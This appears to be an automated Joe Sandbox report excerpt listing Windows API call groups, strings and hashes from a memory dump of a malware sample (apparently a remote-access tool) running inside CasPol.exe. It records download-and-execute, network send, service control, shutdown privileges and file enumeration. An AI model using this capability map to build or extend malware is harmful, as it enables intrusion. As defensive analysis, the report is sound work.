                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00408AE0
                                                                              • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408AF7
                                                                                • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000), ref: 0040450E
                                                                                • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
                                                                                • Part of subcall function 004047EB: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                                                                                • Part of subcall function 004047EB: SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                                                                                • Part of subcall function 004047EB: CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00408DA1
                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
                                                                              • String ID:
                                                                              • API String ID: 4043647387-0
                                                                              • Opcode ID: 34a35fb80ce348306b7ea12774f85c8e72a5665ed38fc8cc2b943c529c65861d
                                                                              • Instruction ID: d7705bc86650fd6632c5f082d335fbcd32bd3fe840799e2454ee74f5ab9ae988
                                                                              • Opcode Fuzzy Hash: 34a35fb80ce348306b7ea12774f85c8e72a5665ed38fc8cc2b943c529c65861d
                                                                              • Instruction Fuzzy Hash: 11A15C729001089ACB14EBA1DD92AEDB778AF54318F10427FF546B71D2EF385E498B98
                                                                              APIs
                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,0041981A,00000000,00000000), ref: 00419BCD
                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,0041981A,00000000,00000000), ref: 00419BE2
                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419BEF
                                                                              • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041981A,00000000,00000000), ref: 00419BFA
                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0C
                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0F
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Service$CloseHandle$Open$ManagerStart
                                                                              • String ID:
                                                                              • API String ID: 276877138-0
                                                                              • Opcode ID: b329c8b03f607fc556bfe747d7dfe709dacdcffe937466b951116c7124fc47ce
                                                                              • Instruction ID: 9ab78235182221d9a13884b701025ebbd4d22640777282bd149d85cf0e5c5631
                                                                              • Opcode Fuzzy Hash: b329c8b03f607fc556bfe747d7dfe709dacdcffe937466b951116c7124fc47ce
                                                                              • Instruction Fuzzy Hash: 46F0E971404314AFD2115B31FC88DBF2AACEF85BA2B00043AF54193191CF68CD4595B9
                                                                              APIs
                                                                                • Part of subcall function 00416AB7: GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                                • Part of subcall function 00416AB7: OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                                • Part of subcall function 00416AB7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                                • Part of subcall function 00416AB7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                                • Part of subcall function 00416AB7: GetLastError.KERNEL32 ref: 00416B02
                                                                              • ExitWindowsEx.USER32(00000000,00000001), ref: 0041595B
                                                                              • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00415970
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00415977
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                              • String ID: PowrProf.dll$SetSuspendState
                                                                              • API String ID: 1589313981-1420736420
                                                                              • Opcode ID: 204994bc045b12a58d302f5ccdbfb23efbfdd41b70a37fa13545696ca80e0191
                                                                              • Instruction ID: 94bd0be5b4d635cf3270abd21b93e0cba208aed3fdadf5553bbce7524c8ebf13
                                                                              • Opcode Fuzzy Hash: 204994bc045b12a58d302f5ccdbfb23efbfdd41b70a37fa13545696ca80e0191
                                                                              • Instruction Fuzzy Hash: 7D2150B0604741E6CA14F7B19856AEF225A9F80748F40883FB402A72D2EF7CDC89865E
                                                                              APIs
                                                                              • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 0045127C
                                                                              • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 004512A5
                                                                              • GetACP.KERNEL32 ref: 004512BA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: InfoLocale
                                                                              • String ID: ACP$OCP
                                                                              • API String ID: 2299586839-711371036
                                                                              • Opcode ID: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                              • Instruction ID: bcb6c1b5649eca6e102b6d6ca9fa22aa61ab34f591545d84575f60c76f210f03
                                                                              • Opcode Fuzzy Hash: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                              • Instruction Fuzzy Hash: 50212722600100A6D7348F54D900BAB73A6AB40B66F1645E6FD09E7322F736DD49C799
                                                                              APIs
                                                                              • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041A650
                                                                              • LoadResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A664
                                                                              • LockResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A66B
                                                                              • SizeofResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A67A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Resource$FindLoadLockSizeof
                                                                              • String ID: SETTINGS
                                                                              • API String ID: 3473537107-594951305
                                                                              • Opcode ID: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                              • Instruction ID: 83a829ee02157d331b98a48cb758db5ec39b6d120b3a3db205f860a33549a403
                                                                              • Opcode Fuzzy Hash: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                              • Instruction Fuzzy Hash: 3EE01A3A200710ABCB211BA5BC8CD477E39E7867633140036F90582331DA358850CA59
                                                                              APIs
                                                                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B
                                                                              • GetUserDefaultLCID.KERNEL32 ref: 004514C3
                                                                              • IsValidCodePage.KERNEL32(00000000), ref: 0045151E
                                                                              • IsValidLocale.KERNEL32(?,00000001), ref: 0045152D
                                                                              • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00451575
                                                                              • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 00451594
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                              • String ID:
                                                                              • API String ID: 745075371-0
                                                                              • Opcode ID: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                              • Instruction ID: fdda48fcf8ef828b158f806230e01f9d82b9b72a6df542884d0e4dc3e0683d2c
                                                                              • Opcode Fuzzy Hash: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                              • Instruction Fuzzy Hash: 5A51D571900205ABEF10EFA5CC40BBF73B8AF05702F14056BFD11EB262E7789A488769
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 00407A91
                                                                              • FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                              • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407C76
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Find$File$CloseFirstH_prologNext
                                                                              • String ID:
                                                                              • API String ID: 1157919129-0
                                                                              • Opcode ID: afbe0c78addfd1fe1d4ebc6b55e9774795b3d026fa1d08a9208b54e180043126
                                                                              • Instruction ID: c296e4c637b16ec180f1d25cf2666c4e6f2336455dd814d501b84ef2841b6e91
                                                                              • Opcode Fuzzy Hash: afbe0c78addfd1fe1d4ebc6b55e9774795b3d026fa1d08a9208b54e180043126
                                                                              • Instruction Fuzzy Hash: 485173329041085ACB14FB65DD969DD7778AF50318F50417EB806B31E2EF38AB498B99
                                                                              APIs
                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406234
                                                                              • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406318
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: DownloadExecuteFileShell
                                                                              • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$open
                                                                              • API String ID: 2825088817-4197237851
                                                                              • Opcode ID: 8ba785b80dafa41abaee6032e4d064bba756fb94a7f51b7ee612986cc14c7222
                                                                              • Instruction ID: f68f5450864a8ef507c8d3860f756bd811b48be2db930e76b40a644c5c1bb7bc
                                                                              • Opcode Fuzzy Hash: 8ba785b80dafa41abaee6032e4d064bba756fb94a7f51b7ee612986cc14c7222
                                                                              • Instruction Fuzzy Hash: 0761A33160434067CA14FA76C8569BE77A69F81718F00493FBC46772D6EF3C9A05C69B
                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ADD
                                                                              • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406BA5
                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FileFind$FirstNextsend
                                                                              • String ID: x@G$x@G
                                                                              • API String ID: 4113138495-3390264752
                                                                              • Opcode ID: a8f7eea59e91c06644f6a958b0b0fcf8cb394d5864f2785748c83d4b13fddec0
                                                                              • Instruction ID: 9df0c8526107c53e8273efc1e688d8f669138e67c86485f4ac558c26d22f9560
                                                                              • Opcode Fuzzy Hash: a8f7eea59e91c06644f6a958b0b0fcf8cb394d5864f2785748c83d4b13fddec0
                                                                              • Instruction Fuzzy Hash: B42147725043015BC714FB61D8959AF77A8AFD1358F40093EF996A31D1EF38AA088A9B
                                                                              APIs
                                                                              • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                                                • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                                                                • Part of subcall function 004126D2: RegSetValueExA.KERNELBASE(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                                                                                • Part of subcall function 004126D2: RegCloseKey.KERNELBASE(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseCreateInfoParametersSystemValue
                                                                              • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                              • API String ID: 4127273184-3576401099
                                                                              • Opcode ID: f4ba7aec24a953ef4b92a26ea97f229a08492362b077529f009aa708e5b31fc0
                                                                              • Instruction ID: a6c166168c7895b99543370299e99232025f4d6daba66cbb636fef562e17b9dc
                                                                              • Opcode Fuzzy Hash: f4ba7aec24a953ef4b92a26ea97f229a08492362b077529f009aa708e5b31fc0
                                                                              • Instruction Fuzzy Hash: 06112432B8060433D514303A4E6FBAE1806D356B60FA4415FF6026A6DAFA9E5AE103DF
                                                                              APIs
                                                                              • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                                                • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                                                                • Part of subcall function 004126D2: RegSetValueExA.KERNELBASE(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                                                                                • Part of subcall function 004126D2: RegCloseKey.KERNELBASE(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseCreateInfoParametersSystemValue
                                                                              • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                              • API String ID: 4127273184-3576401099
                                                                              • Opcode ID: 3cca19850bf31f4f0fb7f64d74422f26e2d0d512dadd11c93372ceda303b45d5
                                                                              • Instruction ID: f2617a255fd7246e173cf48333a5ec3092ca3a632a8680fa2b2f8bd5747a896b
                                                                              • Opcode Fuzzy Hash: 3cca19850bf31f4f0fb7f64d74422f26e2d0d512dadd11c93372ceda303b45d5
                                                                              • Instruction Fuzzy Hash: 9EF0623278011422D529357A8E2FBEE1801D796B20F65402FF202A57D6FB8E46D142DE
                                                                              APIs
                                                                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                              • IsValidCodePage.KERNEL32(00000000), ref: 00450B61
                                                                              • _wcschr.LIBVCRUNTIME ref: 00450BF1
                                                                              • _wcschr.LIBVCRUNTIME ref: 00450BFF
                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 00450CA2
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                              • String ID:
                                                                              • API String ID: 4212172061-0
                                                                              • Opcode ID: 30824fb3cb19d2287357d207385eed7a408457ce34d3ac4732c67f259351ba65
                                                                              • Instruction ID: a02e79dc60b90d06ce6287b0e519d5a2a37574338541b46fb9e412c2f7ec0900
                                                                              • Opcode Fuzzy Hash: 30824fb3cb19d2287357d207385eed7a408457ce34d3ac4732c67f259351ba65
                                                                              • Instruction Fuzzy Hash: D7613B79600306AAD729AB75CC82AAB73ACEF05316F14052FFD05D7243E778E909C768
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 00408DAC
                                                                              • FindFirstFileW.KERNEL32(00000000,?), ref: 00408E24
                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00408E4D
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FileFind$FirstH_prologNext
                                                                              • String ID:
                                                                              • API String ID: 301083792-0
                                                                              • Opcode ID: 31790f828c392afa232191d11ff8bc0f8b84cf3cfa5ee74fabc000db9bac9bdb
                                                                              • Instruction ID: 60446431aa0b45b5fc099c057f6d50f3e7887136e12703af2d86415be67689ac
                                                                              • Opcode Fuzzy Hash: 31790f828c392afa232191d11ff8bc0f8b84cf3cfa5ee74fabc000db9bac9bdb
                                                                              • Instruction Fuzzy Hash: 357140328001099BCB15EBA1DC919EE7778AF54318F10427FE856B71E2EF386E45CB98
                                                                              APIs
                                                                              • _free.LIBCMT ref: 00448067
                                                                                • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                              • GetTimeZoneInformation.KERNEL32 ref: 00448079
                                                                              • WideCharToMultiByte.KERNEL32(00000000,?,0047179C,000000FF,?,0000003F,?,?), ref: 004480F1
                                                                              • WideCharToMultiByte.KERNEL32(00000000,?,004717F0,000000FF,?,0000003F,?,?,?,0047179C,000000FF,?,0000003F,?,?), ref: 0044811E
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                                                                              • String ID:
                                                                              • API String ID: 806657224-0
                                                                              • Opcode ID: 5e34e117c6e33b8c0844c195e2b7af46f687c91a19e7202acb7e93967a2f0af9
                                                                              • Instruction ID: ab6739d36243922ba69d1bbe12a1b6ae93f84769bc63f42ae41568d8b76a7737
                                                                              • Opcode Fuzzy Hash: 5e34e117c6e33b8c0844c195e2b7af46f687c91a19e7202acb7e93967a2f0af9
                                                                              • Instruction Fuzzy Hash: 8731DA70904205DFEB149F68CC8186EBBF8FF05760B2442AFE054AB2A1DB349A42DB18
                                                                              APIs
                                                                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B
                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450EBE
                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450F0F
                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450FCF
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorInfoLastLocale$_free$_abort
                                                                              • String ID:
                                                                              • API String ID: 2829624132-0
                                                                              • Opcode ID: 0004d795c3ddcb7d717e2e5c50f1122ee861edcca01c339632c8702d630a2b0e
                                                                              • Instruction ID: e92eb603d23812efeda5bde14236c6fbce748c008cf001f3fb8de25b7fcb8669
                                                                              • Opcode Fuzzy Hash: 0004d795c3ddcb7d717e2e5c50f1122ee861edcca01c339632c8702d630a2b0e
                                                                              • Instruction Fuzzy Hash: AC61D3365002079FDB289F24CD82BBB77A8EF04706F1041BBED05C6696E778D989DB58
                                                                              APIs
                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 0043A755
                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 0043A75F
                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 0043A76C
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                              • String ID:
                                                                              • API String ID: 3906539128-0
                                                                              • Opcode ID: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                                              • Instruction ID: 15fc2c217458336097e8e19d69e2940e7c5a4b77666d4e23b7e272f62fea865b
                                                                              • Opcode Fuzzy Hash: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                                              • Instruction Fuzzy Hash: 2D31D47490121CABCB21DF64D98979DBBB8BF08310F5052EAE81CA7251E7349F81CF49
                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32(?,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002,00000000), ref: 00442575
                                                                              • TerminateProcess.KERNEL32(00000000,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002,00000000), ref: 0044257C
                                                                              • ExitProcess.KERNEL32 ref: 0044258E
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Process$CurrentExitTerminate
                                                                              • String ID:
                                                                              • API String ID: 1703294689-0
                                                                              • Opcode ID: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                              • Instruction ID: 6e58600c80f72e94ca833af3256d2da28fe7ef7edb4b61bff2e48710a34f1207
                                                                              • Opcode Fuzzy Hash: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                              • Instruction Fuzzy Hash: 65E08C31004648BFDF016F14EE18A893F29EF10346F408475F80A8A632CFB9DE92CB88
                                                                              APIs
                                                                              • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004475EA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: InfoLocale
                                                                              • String ID: GetLocaleInfoEx
                                                                              • API String ID: 2299586839-2904428671
                                                                              • Opcode ID: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                                              • Instruction ID: 80a81796b135a3e0eaabc3ca7fb48afb6b687e063e78a0117ef0368584b3b56e
                                                                              • Opcode Fuzzy Hash: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                                              • Instruction Fuzzy Hash: 82F0F031A44308BBDB11AF61EC06F6E7B25EF04712F00416AFC046A2A2CB359E11969E
                                                                              APIs
                                                                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B
                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045110E
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLast$_free$InfoLocale_abort
                                                                              • String ID:
                                                                              • API String ID: 1663032902-0
                                                                              • Opcode ID: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                              • Instruction ID: 725ff80feb3504da526bb6f16fdbe645276de1ecdd37ac2f1e7666d8a95350e0
                                                                              • Opcode Fuzzy Hash: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                              • Instruction Fuzzy Hash: 2D21B332500606ABDB249A25DC46B7B73A8EB09316F1041BBFE01C6252EB79DD48CB99
                                                                              APIs
                                                                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                              • EnumSystemLocalesW.KERNEL32(00450E6A,00000001), ref: 00450DB4
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                              • String ID:
                                                                              • API String ID: 1084509184-0
